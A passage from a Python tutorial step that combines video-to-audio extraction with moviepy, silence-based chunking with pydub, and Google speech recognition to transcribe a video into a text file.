Step 4: Putting It Together

Finally, we can combine our functions. First, we extract the audio from the video. Second, we chunk the audio into smaller files and recognize speech independently on each chunk using Google’s speech recognition module.

I added comments to annotate the most important parts of this code:

# Import libraries
import speech_recognition as sr
import os
from pydub import AudioSegment
from pydub.silence import split_on_silence
import moviepy.editor as mp


def video_to_audio(in_path, out_path):
    """Convert video file to audio file"""
    video = mp.VideoFileClip(in_path)
    video.audio.write_audiofile(out_path)


def large_audio_to_text(path):
    """Split audio into chunks and apply speech recognition"""
    # Open audio file with pydub
    sound = AudioSegment.from_wav(path)

    # Split audio where silence is 700ms or greater and get chunks
    chunks = split_on_silence(sound,
                              min_silence_len=700,
                              silence_thresh=sound.dBFS-14,
                              keep_silence=700)

    # Create folder to store audio chunks
    folder_name = "audio-chunks"
    if not os.path.isdir(folder_name):
        os.mkdir(folder_name)

    whole_text = ""

    # Process each chunk
    for i, audio_chunk in enumerate(chunks, start=1):
        # Export chunk and save in folder
        chunk_filename = os.path.join(folder_name, f"chunk{i}.wav")
        audio_chunk.export(chunk_filename, format="wav")

        # Recognize chunk
        with sr.AudioFile(chunk_filename) as source:
            audio_listened = r.record(source)

            # Convert to text
            try:
                text = r.recognize_google(audio_listened)
            except sr.UnknownValueError as e:
                print("Error:", str(e))
            else:
                text = f"{text.capitalize()}. "
                print(chunk_filename, ":", text)
                whole_text += text

    # Return text for all chunks
    return whole_text


# Create a speech recognition object
r = sr.Recognizer()

# Video to audio to text
video_to_audio('sample_video.mp4', 'sample_audio.wav')
result = large_audio_to_text('sample_audio.wav')

# Print to shell and file
print(result)
print(result, file=open('result.txt', 'w'))

Store this code in a folder next to your video file 'sample_video.mp4' and run it. It will create an audio file 'sample_audio.wav', chunk the audio, and print the result to the shell as well as to a file called 'result.txt', which contains the transcription of the video file.